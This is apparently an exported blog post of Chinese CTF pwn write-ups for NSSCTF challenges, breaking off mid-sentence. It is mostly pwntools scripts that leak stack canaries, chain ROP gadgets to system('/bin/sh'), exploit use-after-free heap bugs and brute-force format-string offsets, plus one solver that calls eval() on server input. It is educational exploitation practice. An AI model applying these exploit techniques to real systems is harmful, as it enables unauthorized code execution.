{"id":653,"date":"2025-12-09T11:15:13","date_gmt":"2025-12-09T03:15:13","guid":{"rendered":"https:\/\/www.okabe.xin\/wordpress\/?p=653"},"modified":"2025-12-13T13:56:12","modified_gmt":"2025-12-13T05:56:12","slug":"%e8%b6%85%e8%b6%85%e8%b6%85%e5%a4%a7%e6%9d%af%e6%9d%a5%e4%ba%86","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=653","title":{"rendered":"\u8d85\u8d85\u8d85\u5927\u676f\u6765\u4e86"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">NSSCTF<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">[2021 \u9e64\u57ce\u676f]littleof<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>from LibcSearcher import *<br>context(os='linux', arch='amd64', log_level='debug')<br>\u200b<br>p = remote('node4.anna.nssctf.cn',28679)<br>\u200b<br>elf = ELF('.\/littleof')<br>\u200b<br>pop_rdi = 0x0400863<br>ret = 0x040059e<br>main_addr = 0x04006E2<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>#\u83b7\u53d6canary\u5730\u5740<br>payload = b'a'*(0x50-9) + b'b' &nbsp;#\u8fd9\u91cc0x50-9\u591a\u51cf\u4e00\u4e2a1\u662f\u56e0\u4e3a\u65b9\u4fbf\u6211\u4eec\u5b9a\u4f4d<br>p.sendlineafter('Do you know how to do buffer overflow?', payload)<br>p.recvuntil(b'ab\\n')<br>canary_addr = u64(p.recv(7).rjust(8,b'\\x00')) #\u63a5\u6536anary\u5730\u5740\uff0c\u63a5\u65367\u4e2a\u5b57\u7b26\u4e32\u4e0d\u8db3\u516b\u4e2a\u7528\\x00\u8865\u9f50\u7136\u540e\u7528u64\u8fdb\u884c\u6253\u5305\uff08\u6ce8\u610f\u8fd9\u91cc\u662frjust\u4e5f\u5c31\u662f\u53f3\u5bf9\u9f50\u5b57\u7b26\u4e32\uff09<br>print(hex(canary_addr))<br>\u200b<br>\u200b<br>#\u6cc4\u9732got\u8868\u5730\u5740<br>payload2 = b'a' * (0x50-8) + p64(canary_addr) + p64(0) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr) 
#\u51cf\u53bbcanary\u518dbuf\u4e2d\u7684\u5927\u5c0f\u7136\u540e\u52a0\u4e0acanary\u5730\u5740\u518d\u52a0\u4e0a8\u4e2a\u5b57\u8282\u8986\u76d6\u5230\u8fd4\u56de\u5730\u5740\uff0c\u518d\u52a0\u4e0ardi\u5b58\u5165puts_got\u5730\u5740\u5f53\u4f5c\u53c2\u6570\u7136\u540e\u4f7f\u7528puts_plt\u8f93\u51faputs_got\u5730\u5740\u518d\u6267\u884cmain\u51fd\u6570<br>p.sendlineafter('Try harder!', payload2)<br>p.recvuntil(b'I hope you win')<br>puts_addrs = u64(p.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00')) #\u63a5\u6536puts\u51fd\u6570\u518dgot\u8868\u9879\u4e2d\u7684\u5730\u5740\uff0c\u4ece\\x7f\u5f00\u59cb\u5411\u540e\u63a5\u65366\u4e2a\u5b57\u7b26\uff0c\u4e0d\u8db38\u4e2a\u7528\\x00\u8865\u9f50\uff0c\uff08\u6ce8\u610f\u8fd9\u91cc\u662fljust\u4e5f\u5c31\u662f\u5de6\u5bf9\u9f50\uff09<br>print(hex(puts_addrs))<br>\u200b<br>#\u8ba1\u7b97\u51falibc\u57fa\u5730\u5740,\u6b64\u9898libc\u67e5\u8be2\u4e0d\u5230\uff01<br>'''<br>libc = LibcSearcher('puts', puts_addrs)<br>'''<br>libc_base = puts_addrs - 0x80aa0<br>systeam_addrs = libc_base + 0x4f550<br>bin_sh_addrs = libc_base + + 0x1b3e1a<br>\u200b<br>#\u91cd\u590d\u7b2c\u4e00\u4e2a\u6b65\u9aa4\u8fd9\u91cc\u518d\u6b21\u83b7\u53d6canary\u5730\u5740\u662f\u56e0\u4e3a\u6211\u4eec\u518d\u4e0a\u4e00\u6b21payload\u4e2d\u6700\u540e\u4e00\u6bb5\u5199\u5165\u4e86main\u51fd\u6570\u6240\u4ee5\u7a0b\u5e8f\u518d\u6267\u884c\u5b8c\u4e0a\u4e00\u6b21\u7684paylaod\u540e\u4f1a\u91cd\u65b0\u8fd0\u884c\u7a0b\u5e8f\u8fd9\u91cc\u5c31\u91cd\u5934\u5f00\u59cb\u4e86\uff0c\u53c8\u56e0\u4e3a\u7a0b\u5e8f\u662f\u9700\u8981\u8f93\u5165\u4e24\u6b21\u800c\u6211\u4eec\u53c8\u662f\u518d\u7b2c\u4e8c\u6b21\u8f93\u5165\u65f6\u8fdb\u884c\u6784\u9020payload\u8fd4\u56de\u5730\u5740\u6240\u4ee5\u6b64\u5904\u6211\u4eec\u5c31\u8981\u518d\u83b7\u53d6\u4e00\u6b21canary\u5730\u5740<br>payload3 = b'a'*(0x50-9) + b'b' &nbsp;#\u8fd9\u91cc0x50-9\u591a\u51cf\u4e00\u4e2a1\u662f\u56e0\u4e3a\u65b9\u4fbf\u6211\u4eec\u5b9a\u4f4d<br>p.sendlineafter('Do you know how to do buffer 
overflow?', payload3)<br>p.recvuntil(b'ab')<br>canary_addr2 = u64(p.recv(7).rjust(8,b'\\x00'))<br>print(hex(canary_addr2))<br>\u200b<br>#\u6784\u9020shellcode<br>payload4 = b'a' * (0x50-8) + p64(canary_addr) + p64(0) + p64(ret) + p64(pop_rdi) + p64(bin_sh_addrs) + p64(systeam_addrs) &nbsp;#\u6784\u9020\u7b2c\u4e8c\u6b21payload\u8fd9\u91cc\u6dfb\u52a0ret\u7684\u5730\u5740\u662f\u4e3a\u4e86\u4fdd\u8bc1\u6808\u5bf9\u9f50\u3002<br>p.sendlineafter('Try harder!', payload4)<br>\u200b<br>\u200b<br>p.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[LitCTF 2023]\u53e3\u7b97\u9898\u5361<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = remote(\"node4.anna.nssctf.cn\",28257)<br>io.recvuntil(b\"is \")<br>for i in range(100):<br> &nbsp;  io.recvuntil(b\"is \")<br> &nbsp;  a = io.recv()&#91;0:-2]<br> &nbsp;  a_text = a.decode()<br>\u200b<br> &nbsp;  result = eval(a_text)<br>\u200b<br> &nbsp;  io.sendline(str(result).encode())<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[WUSTCTF 2020]getshell2<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote('node5.anna.nssctf.cn', 20971)<br>sh = 0x08048670<br>call_sys = 0x8048529<br>payload = b'A'*(0x18+4) + p32(call_sys) +p32(sh)<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]fmtstrre<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u7206\u7834\u6cd5\uff0c\u4e0d\u591f\u4f18\u96c5\uff0c\u6709gdb\u8c03\u8bd5\u67e5\u5230\u662f0x20\u7684\u4f4d\u7f6e\uff0c\u7136\u540e\u52a0\u516d\u4e2a\u5bc4\u5b58\u5668\u5730\u5740\u7684\u8bf4\u6cd5<br>#0x20 = 32 &nbsp; || 32+6 = 38<br>#\u6240\u4ee5\u662f%38$s<br>from pwn import *<br>\u200b<br>\u200b<br>context.log_level = 'debug'<br>\u200b<br>host = 'node5.anna.nssctf.cn'<br>port = 23089<br>start = 1 &nbsp;# \u8d77\u59cb\u504f\u79fb\u91cf<br>\u200b<br>while True:<br> &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; 
&nbsp;io = remote(host, port)<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u63a5\u6536\u521d\u59cb\u63d0\u793a\u4fe1\u606f<br> &nbsp; &nbsp; &nbsp; &nbsp;io.recvuntil('Input your format string.')<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u53d1\u9001\u5f53\u524d\u504f\u79fb\u91cf\u7684payload<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = f'%{start}$s'.encode()<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendline(payload)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u63a5\u6536\u54cd\u5e94<br> &nbsp; &nbsp; &nbsp; &nbsp;io.recvline() &nbsp;# \u63a5\u6536\"Ok.\"<br> &nbsp; &nbsp; &nbsp; &nbsp;res = io.recvline()<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f'Offset {start}: {res.decode().strip()}')<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;start += 1 &nbsp;# \u504f\u79fb\u91cf+1<br> &nbsp; &nbsp; &nbsp; &nbsp;io.close()<br>\u200b<br> &nbsp; &nbsp;except EOFError:<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f'\u65ad\u5f00\u8fde\u63a5\uff0c\u5c1d\u8bd5\u4e0b\u4e00\u4e2a\u504f\u79fb\u91cf: {start + 1}')<br> &nbsp; &nbsp; &nbsp; &nbsp;start += 1 &nbsp;# \u65ad\u8054\u540e\u504f\u79fb\u91cf+1<br> &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;io.close()<br> &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<br> &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f'\u9519\u8bef: {e}\uff0c\u7ee7\u7eed\u6d4b\u8bd5\u504f\u79fb\u91cf: {start}')<br> &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;io.close()<br> &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[NISACTF 2022]UAF<\/h2>\n\n\n\n<p>main\u51fd\u6570\u7eaf\u6253\u5370\u83dc\u5355\u7684<\/p>\n\n\n\n<p>\u6ca1\u5565\u4e1c\u897f<\/p>\n\n\n\n<p>\u8fdb\u83dc\u5355\u64cd\u4f5c\u91cc\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"570\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-654\"  sizes=\"auto, (max-width: 740px) 100vw, 740px\" \/><\/div><\/figure>\n\n\n\n<p>\u770b\u5230\u8fd9\u91cc\u5bf9i = 0\u7684\u60c5\u51b5\u505a\u4e86\u4fdd\u62a4<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"505\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-655\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-2.png'><img 
class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"659\" height=\"449\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-656\"  sizes=\"auto, (max-width: 659px) 100vw, 659px\" \/><\/div><\/figure>\n\n\n\n<p>\u4ed4\u7ec6\u89c2\u5bdf\u540e\uff0c\u53d1\u73b0\u57fa\u672c\u4e0a\u90fd\u6709\u5305\u542b0\u7684\u60c5\u51b5\u5e76\u8fdb\u884c\u5904\u7406<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"326\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-657\"  sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f46\u662fdel\u51fd\u6570\u6ca1\u6709\u5bf9i = 0\u8fdb\u884c\u5305\u542b\u5904\u7406<\/p>\n\n\n\n<p>\u524d\u9762\u7684\u5bf9i = 
0\u7684\u60c5\u51b5\u8fdb\u884c\u5305\u542b\uff0c\u5bfc\u81f4\u4e86\u6211\u4eec\u65e0\u6cd5\u76f4\u63a5\u5bf9\u9875\u97620\u7684\u5185\u5bb9\u8fdb\u884cedit\u64cd\u4f5c<\/p>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u9700\u8981\u5148\u7533\u8bf7\u4e00\u4e2a\uff0c\u7136\u540e\u91ca\u653e\u6389\uff0c\u56e0\u4e3a\u5b83\u6307\u9488\u6ca1\u7f6e\u96f6<\/p>\n\n\n\n<p>\u6240\u4ee5\u5f53\u6211\u4eec\u518d\u7533\u8bf7\u7684\u65f6\u5019\uff0c\u56e0\u4e3a\u5927\u5c0f\u662f\u4e00\u6837\u7684\uff0c\u6240\u4ee5\u8fd8\u662f\u539f\u6765\u7684\u90a3\u4e2a\u5806\u5757\uff0c\u90a3\u4e2a\u6307\u9488\u4e5f\u8fd8\u5728\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ea\u8981\u6211\u4eec\u5bf9\u5176\u8fdb\u884cedit\u64cd\u4f5c\u7136\u540e\u7528show\u53bb\u5c55\u793a\u5185\u5bb9\uff0c\u5c31\u80fd\u5b8c\u6210getshell<\/p>\n\n\n\n<p>\u6b38\uff0c\u4e3a\u4ec0\u4e48\u5c31getshell\u4e86\uff0c\u56e0\u4e3a\u8fd9\u9898\u7ed9\u4e86system(command);<\/p>\n\n\n\n<p>\u6240\u4ee5\u8f6c\u5230getshell\u7684\u5730\u5740\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u56e0\u4e3apage \u5373 &amp;(page[0])\uff0cpage+1\u5373&amp;(page[1]) \uff0cfunc\u5728page[0]\u5411\u540e\u504f\u79fb4byte\u5904\uff0c\u6240\u4ee5argu\u4e0d\u80fd\u592a\u957f\uff0c\u5fc5\u987b\u5c0f\u4e8e4byte<\/p>\n\n\n\n<p>\u6240\u4ee5\u5728\u4f20\u5165\u8fdbshell\u7684\u547d\u4ee4\u65f6\uff0c\u8981\u6ce8\u610f\u6784\u9020\uff1a\u2019\/bin\/sh0x00\u2019\u592a\u957f\u4e86\uff0c\u6362\u6210\u2018sh\\x00\\x00\u2019\uff0c\u51714byte + getshell_addr<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\ncontext.log_level = 'debug'\nio = remote('node4.anna.nssctf.cn', 28245)\n\u200b\nbackdoor = 0x8048642\n\u200b\n\u200b\n# payload = b'sh\\x00\\x00' + p32(backdoor)\npayload = b'sh;\\00' + p32(backdoor)\n\u200b\ndef create():\n \u00a0 \u00a0io.sendline(b'1')\n\u200b\ndef delete():\n \u00a0 \u00a0io.sendline(b'3')\n \u00a0 \u00a0io.sendline(b'0')\n\u200b\ndef edit():\n \u00a0 \u00a0io.sendline(b'2')\n \u00a0 \u00a0io.sendline(b'1')\n \u00a0 
\u00a0io.sendline(payload)\n\u200b\ndef show():\n \u00a0 \u00a0io.sendline(b'4')\n \u00a0 \u00a0io.sendline(b'0')\n\u200b\ncreate()\ndelete()\ncreate()\nedit()\nshow()\n\u200b\nio.interactive()\n\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[BJDCTF 2020]YDSneedGirlfriend<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>\u200b<br>\u200b<br>io = remote('node4.anna.nssctf.cn', 28929)<br>\u200b<br>\u200b<br>backdoor = 0x400B9C<br>payload = p64(backdoor)<br>\u200b<br>\u200b<br>def add(size, data):<br> &nbsp; &nbsp;io.sendline(b'1') &nbsp;# \u53d1\u9001\u9009\u98791<br> &nbsp; &nbsp;io.recvuntil(b'Her name size is :') &nbsp;# \u7b49\u5f85size\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(str(size).encode()) &nbsp;# \u53d1\u9001size<br> &nbsp; &nbsp;io.recvuntil(b'Her name is :') &nbsp;# \u7b49\u5f85name\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(data) &nbsp;# \u53d1\u9001name\u5185\u5bb9<br>\u200b<br>def delete(idx):<br> &nbsp; &nbsp;io.sendline(b'2') &nbsp;# \u53d1\u9001\u9009\u98792<br> &nbsp; &nbsp;io.recvuntil(b'Index :') &nbsp;# \u7b49\u5f85\u7d22\u5f15\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(str(idx).encode()) &nbsp;# \u53d1\u9001\u7d22\u5f15<br>\u200b<br>def show(idx):<br> &nbsp; &nbsp;io.sendline(b'3') &nbsp;# \u53d1\u9001\u9009\u98793<br> &nbsp; &nbsp;io.recvuntil(b'Index :') &nbsp;# \u7b49\u5f85\u7d22\u5f15\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(str(idx).encode()) &nbsp;# \u53d1\u9001\u7d22\u5f15<br>\u200b<br>\u200b<br># \u5229\u7528\u6d41\u7a0b\uff1a\u4e25\u683c\u6309\u5806\u5206\u914d\u903b\u8f91\u6267\u884c<br>add(0x30, b'aaa') &nbsp;# \u5206\u914d\u7b2c1\u4e2a\u5bf9\u8c61\uff08A0+B0\uff09<br>add(0x30, b'bbb') &nbsp;# \u5206\u914d\u7b2c2\u4e2a\u5bf9\u8c61\uff08A1+B1\uff09<br>delete(0) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u91ca\u653eA0\u548cB0\uff08UAF\uff09<br>delete(1) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# 
\u91ca\u653eA1\u548cB1\uff08UAF\uff09<br>\u200b<br># \u5206\u914d0x10\u5927\u5c0f\u7684B chunk\uff0c\u91cd\u7528A0\u7684\u5730\u5740\uff0c\u8986\u76d6\u51fd\u6570\u6307\u9488<br>add(0x10, payload)<br>\u200b<br>show(0) &nbsp;# \u89e6\u53d1\u88ab\u8986\u76d6\u7684\u51fd\u6570\u6307\u9488\uff0c\u6267\u884cbackdoor<br>\u200b<br>\u200b<br>io.interactive()<br>\u200b<br>\u200b<br>\u200b<br># from pwn import *<br># context.log_level = \"debug\"<br># io=remote('node4.anna.nssctf.cn',28254)<br>#<br>#<br># def add(size,data):<br># &nbsp; &nbsp; io.sendlineafter(\"Your choice :\", \"1\")<br># &nbsp; &nbsp; io.sendlineafter(\"Her name size is :\", str(size))<br># &nbsp; &nbsp; io.sendlineafter(\"Her name is :\", data)<br>#<br># def delete(index):<br># &nbsp; &nbsp; io.sendlineafter(\"Your choice :\", \"2\")<br># &nbsp; &nbsp; io.sendlineafter(\"Index :\", str(index))<br>#<br>#<br># def show(index):<br># &nbsp; &nbsp; io.sendlineafter(\"Your choice :\", \"3\")<br># &nbsp; &nbsp; io.sendlineafter(\"Index :\", str(index))<br>#<br># backdoor=0x400B9C<br>#<br># add(0x30,'aaa')<br># add(0x30,'bbb')<br>#<br># delete(0)<br># delete(1)<br>#<br># add(0x10,p64(backdoor))<br># show(0)<br># io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]ezr0p32<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io &nbsp;= remote('node5.anna.nssctf.cn', 26331)<br>\u200b<br>system = 0x080483D6<br>sh = 0x804A080<br>\u200b<br>payload1 = b'bin\/sh\\x00'<br>io.sendline(payload1)<br>\u200b<br>payload2 = b'a'*(28+4) + p32(system) + p32(0) +p32(sh)<br>io.sendline(payload2)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]Makewish<\/h2>\n\n\n\n<p>\u6808\u8fc1\u79fb + off by null + \u4f2a\u968f\u673a\u6570\uff0c\u4f2a\u968f\u673a\u6570\u80fd\u62ffgdb\u627e\u51fa\u6765<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context(arch='amd64',log_level='debug')<br>\u200b<br> <br># gdb.attach(io)<br># 
raw_input()<br>while(1):<br> &nbsp; &nbsp;io=remote('node4.anna.nssctf.cn',28167)<br> &nbsp; &nbsp;io.recvuntil(b'name\\n\\n')<br> &nbsp; &nbsp;io.sendline(b'a'*39+b'b')<br> &nbsp; &nbsp;io.recvuntil(b'aaab')<br> &nbsp; &nbsp;canary=u64(io.recv(8))-0x0a<br> &nbsp; &nbsp;success(hex(canary))<br> <br> &nbsp; &nbsp;<br> &nbsp; &nbsp;num=707<br> &nbsp; &nbsp;io.send(p32(num))<br> <br> &nbsp; &nbsp;io.recvuntil(b'can make a wish to me\\n')<br> &nbsp; &nbsp;raw_input()<br> &nbsp; &nbsp;backdoor=0x4007C7<br> &nbsp; &nbsp;payload=p64(backdoor)*11+p64(canary)<br> &nbsp; &nbsp;io.send(payload)<br> &nbsp; &nbsp;raw_input()<br> <br> &nbsp; &nbsp;io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[NISACTF 2022]ezheap<\/h2>\n\n\n\n<p>\u5148\u76f4\u63a5exp\u8d77\u624b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#io = process(\".\/ezheap\")<br>io = remote(\"node5.anna.nssctf.cn\",26582)<br>\u200b<br>payload = b'a'*28 + p32(0x21) +b'\/bin\/sh\\x00' <br>\u200b<br>#gdb.attach(io)<br>io.send(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u8fd9\u9898\u7684\u610f\u4e49\u5c31\u5728\u4e8e\u5806\u7ba1\u7406\u673a\u5236\u7684\u5b66\u4e60<\/p>\n\n\n\n<p>\u5806\u8fd9\u4e2a\u4e1c\u897f\u5f88\u62bd\u8c61\uff08\u6211\u8ba4\u4e3a<\/p>\n\n\n\n<p>\u539f\u6837\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"660\" height=\"245\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-4.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-658\"  sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/div><\/figure>\n\n\n\n<p>\u5229\u7528\u6548\u679c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"630\" height=\"225\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-659\"  sizes=\"auto, (max-width: 630px) 100vw, 630px\" 
\/><\/div><\/figure>\n\n\n\n<p>\u4f17\u6240\u4e0d\u5468\u77e5\u554a\uff0c32\u4f4d\u548c64\u4f4d\u5728\u7533\u8bf7\u5806\u5757\u7684\u65f6\u5019\u4f1a\u6709\u4e00\u4e9b\u5947\u5947\u602a\u602a\u7684\u4e8b\u60c5<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f\u7533\u8bf7\u5230\u7684\u5927\u5c0f\u548c\u5199\u7684\u7533\u8bf7\u5927\u5c0f\u4e0d\u4e00\u6837<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u7a0d\u5fae\u5199\u8be6\u7ec6\u4e00\u70b9\u5427<\/p>\n\n\n\n<p>\u7531\u4e8e\u5806\u7ba1\u7406\u673a\u5236\u7684\u95ee\u9898<\/p>\n\n\n\n<p>\u7528\u6237\u7533\u8bf7\u7684\u5927\u5c0f\uff0c\u4f1a\u5148\u5224\u65ad\u662f\u5426\u662f8\u7684\u500d\u6570<\/p>\n\n\n\n<p>\u5982\u679c\u662f\uff0c\u90a3\u5c31\u4e0d\u7ba1\u4e86\u5c31\u8fd9\u6837\u5427<\/p>\n\n\n\n<p>\u5982\u679c\u4e0d\u662f\u5c31\u8865\u8db3\u7a7a\u5b57\u8282\u4fdd\u8bc1\u6ee1\u8db3\u662f8\u7684\u500d\u6570\uff0c\u4ee5\u65b9\u4fbf\u8fdb\u884c\u5806\u7ba1\u7406<\/p>\n\n\n\n<p>\u7136\u540e\u8865\u